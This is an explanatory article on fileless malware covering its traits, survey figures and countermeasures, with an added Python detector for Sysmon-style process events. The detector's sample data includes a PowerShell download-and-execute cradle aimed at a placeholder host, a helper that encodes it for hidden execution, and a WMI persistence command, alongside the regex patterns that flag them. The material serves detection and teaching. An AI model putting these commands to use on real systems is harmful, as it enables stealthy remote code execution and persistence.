Fileless Malware: What Does It Stand For?
Fileless malware, also called non-malware, is a low-footprint attack that does not rely on dropping a malicious executable on disk to infect a machine. Instead, it abuses legitimate tools and processes already present on the system (and, often, an existing vulnerability) to run its payload in memory. Fileless malware illustrates why organizations need to shift from a purely protect/prevent security model to one that also emphasizes detection, incorporating threat intelligence, threat hunting, and blue/red/purple teams. It is an example of defending against the “unknown unknowns.”
Fileless malware resides in the machine's RAM and uses various techniques to run inside trusted processes such as iexplore.exe or the PowerShell host (powershell.exe). From there it executes the attack and can spread to many systems in a short span of time.
Because nothing is written to disk, traditional antivirus has little to detect, prevent, or remove. Rebooting clears the memory-resident payload, since RAM holds data only while the computer is on, but it is not a complete solution: attackers commonly add a persistence mechanism (a registry Run key, a scheduled task, or a WMI event subscription) that relaunches the script at the next boot. Meanwhile the attacker can use the foothold to steal data from the hard disk or to extend the attack to other systems over the network.
Characteristics of Fileless Malware
- It leaves no file on disk to hash or signature-scan, which is why typical file-based antivirus tools cannot detect it.
- Its behavior is the behavior of legitimate tools (PowerShell, WMI, the browser), so simple heuristics that key on a suspicious binary do not fire; detection has to look at command lines, script content, and process lineage instead.
- It is also known as memory-based malware because it lives in RAM.
- It may be paired with other malware.
- It uses legitimate processes to carry out the attack.
- It uses approved applications that already exist on the computer (“living off the land”).
Purpose of Using Fileless Techniques and How It Works
When malware arrives as a file on disk, the antivirus already on that machine can scan, block, quarantine, or remove it. A fileless attack instead executes inside native processes and leaves no such file, so the file scanner never sees it and the malware stays out of reach of the antivirus.
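To make the indicators above concrete, here is an added example in Python (not code from the original article): a small detector that applies them to constructed Sysmon-style process-creation records (Image, ParentImage, CommandLine). It flags the in-memory download-and-execute pattern, the Office-macro-to-PowerShell chain discussed under the countermeasures further down, and the WMI event subscription that lets a payload survive the reboot mentioned earlier. The sample events, paths, and URL are invented for the example.

```python
"""
Added example (not code from the original article): a minimal detector that
applies the behavioural indicators described above to Sysmon-style
process-creation records (Image, ParentImage, CommandLine). All sample
events, paths and URLs are constructed for this example.
"""
from __future__ import annotations

import base64
import re

# Office applications whose macros are a common first stage.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Script hosts and built-in binaries a macro typically spawns to stay fileless.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "cmd.exe"}

# In-memory download-and-execute ("download cradle"): fetch code and pipe it
# straight into Invoke-Expression so nothing touches disk. Either order.
CRADLE_RE = re.compile(
    r"(invoke-expression|\biex\b).*?(downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient)"
    r"|(downloadstring|net\.webclient|invoke-webrequest).*?(invoke-expression|\biex\b)",
    re.I | re.S)
# Persistence that survives a reboot without dropping a binary.
PERSIST_RE = re.compile(
    r"register-wmievent|__eventfilter|commandlineeventconsumer"
    r"|schtasks(\.exe)?\s+/create|reg(\.exe)?\s+add\s+.*\\run\b", re.I)
# Switches that hide the window or disable profile/policy checks.
EVASION_RE = re.compile(
    r"-(nop|noprofile|noni|noninteractive|w(indowstyle)?\s+hidden"
    r"|ep\s+bypass|executionpolicy\s+bypass)\b", re.I)
# -EncodedCommand takes base64 of the UTF-16LE script text.
ENCODED_RE = re.compile(r"-(encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)


def encode_for_powershell(script: str) -> str:
    """Encode a script the way attackers do for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload, or '' if there is none."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(2)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""  # malformed, or not really base64


def analyze(event: dict) -> list[str]:
    """Return the names of the indicators that fire on one process-creation event."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    cmd = event["CommandLine"]
    decoded = decode_encoded(cmd)
    text = cmd + "\n" + decoded  # scan both the raw and the decoded command line
    findings = []
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        findings.append(f"office-spawned-script-host: {parent} -> {image}")
    if decoded:
        findings.append("encoded-command")
    if CRADLE_RE.search(text):
        findings.append("in-memory-download-cradle")
    if PERSIST_RE.search(text):
        findings.append("reboot-persistence")
    if EVASION_RE.search(text):
        findings.append("evasion-switches")
    return findings


# Constructed sample events (hypothetical hosts and URL, not real telemetry).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
SAMPLE_EVENTS = [
    {   # 0: an administrator running a normal command; should be clean
        "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell.exe -Command Get-Process"},
    {   # 1: a Word macro launching a hidden, encoded download cradle
        "Image": PS,
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "CommandLine": "powershell -nop -w hidden -enc " + encode_for_powershell(CRADLE)},
    {   # 2: a WMI event subscription installed so the payload survives a reboot
        "Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": 'powershell -NoProfile -Command "Set-WmiInstance -Namespace '
                       'root\\subscription -Class __EventFilter -Arguments @{Name=\'updater\'}"'},
]


def scan(events: list[dict]) -> dict[int, list[str]]:
    """Map the index of each suspicious event to its findings."""
    results = {}
    for i, event in enumerate(events):
        findings = analyze(event)
        if findings:
            results[i] = findings
    return results


if __name__ == "__main__":
    for i, findings in scan(SAMPLE_EVENTS).items():
        print(f"event {i}: {', '.join(findings)}")
```

Each rule on its own is noisy (administrators do use -NoProfile), which is why the detector reports every indicator that fired on an event rather than a single verdict: the combination of an Office parent, an encoded command, and a download cradle is what an analyst should act on, and the decoded script text is what makes the encoded case readable at all.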
A survey performed by Barkly in association with the Ponemon Institute on fileless cyberattacks reported the following:
- The first half of 2018 saw a 94% rise in fileless malware.
- Fileless attacks are 10 times more successful than file-based attacks.
- More than 50% of the surveyed organizations experienced at least one successful attack that compromised their data or IT infrastructure.
- 77% of the surveyed attacks used exploits or fileless techniques.
The Scramble for a Solution
The success of fileless attacks has called into question the existing security norms of organizations, and many are looking for replacement or supplementary security solutions beyond their traditional antivirus. The belief that antivirus can detect almost all malware, including fileless malware, is now being challenged. As a result, a large number of organizations are investing in new solutions.
“4 out of 5 organizations replaced or augmented their existing antivirus in 2017,” as reported by Barkly and Ponemon.
Countermeasures to Combat Fileless Malware
Measures that can be implemented to block fileless malware include the following:
i) Practice email policies:
- Email links:
Luring someone to a malicious website through an email link is a common practice, and many fall for it; this is one way malware enters a Windows computer. Caution employees against clicking links in email, and draft and implement email policies with appropriate restrictions within the organization so that this entry path can be controlled.
- Email attachments:
Educate your employees about how to treat email attachments such as PDF or MS Office documents.
When a document asks for macros to be enabled, some employees follow the instruction without a second thought, and spreading malware by persuading users to enable macros in Microsoft Office documents is a common practice. Rather than relying on users, block macros in documents received from the Internet by policy (Office provides a Group Policy setting for this), so that employees never get into the habit of enabling them.
ii) Dealing with Flash:
Flash has become notorious for spreading malware through browsers. Most browsers have replaced Flash with HTML5 for video, and Adobe ended support for Flash Player at the end of 2020. Microsoft Edge blocks Flash content unless it is explicitly allowed, Firefox and Chrome give you the option to block Flash, and Internet Explorer will not load Flash if you have disabled ActiveX.
iii) Avoid using office Internet for personal purposes:
Make a policy of blocking the use of the official network for personal email or websites. Even though this sort of policy is unpopular, a separate Internet connection can be provided for employees' personal use during breaks. This keeps an infection picked up during personal browsing off the main network.
iv) Protect your browsers:
Make a policy asking employees to use only one browser so that you can install the corresponding browser protection on each computer. Internet Explorer and Microsoft Edge can be protected with Windows Defender Application Guard, a Windows 10 feature that opens untrusted sites in a hardware-isolated container, so that script run by the browser cannot reach the host system. For Firefox or Chrome, install the Webscribe extension, which is mainly a VPN but can also strip social media Like buttons; third-party widgets like these load script from outside your control and are one more potential vector for delivering a payload that ends in PowerShell execution.
v) Strengthen authentication
PowerShell is not the only reason fileless malware spreads; weak user authentication on company networks and servers is another. A non-malware attack spreads quickly once it is established on a system that is reachable throughout the network, typically by reusing credentials harvested there. Implementing two-factor authentication, which prompts for a second factor beyond the password, limits how far an attacker can get with stolen credentials.
According to the survey cited above, fileless attacks are 10 times more likely to succeed than file-based ones, and they are often combined with file-based components to make the attack more powerful and destructive. Discussions about how to prevent such attacks are now making their way into board meetings as well. Organizations are looking to create a strategy that combines several security measures, such as antivirus, endpoint detection, and employee training, to combat these threats.
The recent rise in cyberattacks is creating a lot of employment opportunities for enthusiastic professionals. Whether you belong to the IT sector or are looking to step into the cybersecurity industry, a certification can help you on your way. EC-Council offers a wide variety of cybersecurity certifications for various domains, such as ethical hacking, penetration testing, application security, and cyber forensic investigation. For more details, visit https://www.eccouncil.org/programs/.